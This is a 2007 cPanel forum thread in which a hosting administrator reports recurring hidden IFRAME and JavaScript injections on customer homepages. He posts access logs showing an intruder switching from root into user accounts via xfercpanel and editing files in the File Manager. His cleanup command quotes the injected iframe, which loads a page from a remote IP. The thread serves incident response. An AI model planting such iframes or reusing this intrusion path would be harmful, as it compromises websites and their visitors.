The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

JavaScript & IFRAME Insert Hacks Through xfercpanel

Discussion in 'General Discussion' started by dynaweb, Sep 14, 2007.

  1. dynaweb

    dynaweb Well-Known Member

    Joined:
    May 14, 2003
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Oregon
    I have read other threads concerning this stuff and I feel I need a unique thread for my situation. I am getting these BS IFRAME & JAVASCRIPT inserts onto my domains homepages on my server. I had Cpanel 10 and upgraded to Cpanel 11 with CLAMAV and no better :(

    My files are not being accessed through a vulnerable script or through FTP, but rather through WHM itself (File manager to be exact).

    This means that either A = "Someone" or B = "Some script or worm" is either 1 = "Hacking my root password and gaining access and using xfercpanel to access user accounts" or 2 = "Finding a hole somewhere in Cpanel to gain access to my WHM etc".

    My /usr/local/cpanel/logs/access_log shows evidence of the intrusion:


    """""""""""""""
    Code:
    76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - [09/14/2007:08:52:15 -0000] "GET /login/?session=ZqRBajXbwEIAzkKrtX1TZ8bdboJybQUaSqpaBzfvZ fsXSXHrv_4dO4jq2hDYUx38 HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:52:20 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:52:28 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    ...(A bunch of css and image files listed here)...
    76.108.14.98 - bulldog [09/14/2007:08:54:20 -0000] "GET /frontend/x3/files/img/fileactions/copy.png HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/images/filemantopbg.jpg HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:57 -0000] "POST /frontend/x3/files/savefile.html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:56:40 -0000] "GET /frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:56:45 -0000] "GET /cPanel_magic_revision_1189191533//frontend/x3/yui/data/data_optimized.js HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - [09/14/2007:08:57:23 -0000] "GET /login/?session=BeZr34kPtSssxYbIySRgOK8SN1qQ2czfytgErkTbm qM8mCkzUo2xxgDXgBNq1iKF HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:28 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:33 -0000] "GET /frontend/xcontroller2/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:40 -0000] "GET /frontend/xcontroller2/styles.css HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/xcontroller2/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    ...(This keeps looping to just about every domain on my server)...

    """""""""""""""

    Discovering more about this problem.
    - Blocking the IP address of the intruder is, of course, useless since tomorrow it will happen again from a different IP.
    - Cannot use mod_security since it does not apply to cpanel access ports :(
    - Checking "Tweak Settings -> Disable login with root or reseller password ..." works very effectively, but pisses off people who have WHM access. They would not understand why I have to take away an convenient feature in their accoutn to prevent hacking.

    Some logic:
    I would assume that if the combination of A and 1 are true then someone would have better stuff to do than manually edit users' homepages and then call it a day. Why not make more trouble or do something different? Since this appears to be the only thing bad being done and also due to the methodical nature of the travel through the server as shown by the logs, I am led to assume that A is FALSE and it is being performed by a script of some kind.
    That leaves a probable combination of either B+1 or B+2.
    *If B+1 is true, I need to get a more secure password policy. I have SSH and Exim hacking protected with APF/BFD, but I think Cpanel/WHM hacking is not protcted in such a way. Maybe there is some kind of securrity I can put on there?
    *If B+2 is true, I would like Cpanel to fix the hole.
    Which is true? I have no idea, I hevent gotten that far yet. I am open to suggestion.

    How to deal with this problem?
    Not sure yet other than to mop up the problem when it happens (just about every other day). Here is some script I have been using for damage control:
    find /home/a*/public_html/* -regex ".*\(\.php\|\.html\|\.tpl\|\.htm\|\.inc\)$" -type f -exec replace '<IFRAME SRC="http://81.95.148.155/lb/main.php" WIDTH="0" HEIGHT="0"></IFRAME>' '' -- {} \;

    So is anyone else experiencing these hacks in this same way? What can be done? Thanks for any help.
     
    #1 dynaweb, Sep 14, 2007
    Last edited: Sep 15, 2007
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    711
    Likes Received:
    3
    Trophy Points:
    18
    I've only seen this happen on servers (cpanel or not, just *nix) that were 0wn3d and/or r00ted.

    Generally this is done through normal everyday PHP scripts. phpBB for example has had many huge security issues. In fact for while a simple <? phpinfo(); ?> script could be used to root a server. (makes you reconsider using PHP doesn't it :))

    What specificlly in that log entry are you thinking is evidence of WHM being used to do this?

    The closest I see is "bulldog" trying to edit

    /home/bulldog/public_html/region2/ogin.php

    Is that the file that gets iframed?

    Is the iframe in the HTML or in a database?
     
  3. dynaweb

    dynaweb Well-Known Member

    Joined:
    May 14, 2003
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Oregon
    Thanks for your reply cpdan.

    The iframe or javascript is inserted into html -- typically into the index page but can occur in some other default-type document.

    The document edited in this example is index.html, although you cannot see that exactly from the log. What the log does show is a malicious user, in this case 76.108.14.98, using xfercpanel to go from root to the user's cpanel, then using editit.html and savefile.html (the cpanel FileManager) to actually edit the target document.

    Some good news, I see Cpanel has added the CPHULK to Security Center in WHM. That may help prevent this kind of hacking :rolleyes:
     
  4. dynaweb

    dynaweb Well-Known Member

    Joined:
    May 14, 2003
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Oregon
    Correction. Yes, for this account both login.php and index.html were affected.
     
Loading...
Similar Threads - JavaScript IFRAME Insert
  1. sp3ctre69
    Replies:
    2
    Views:
    364

Share This Page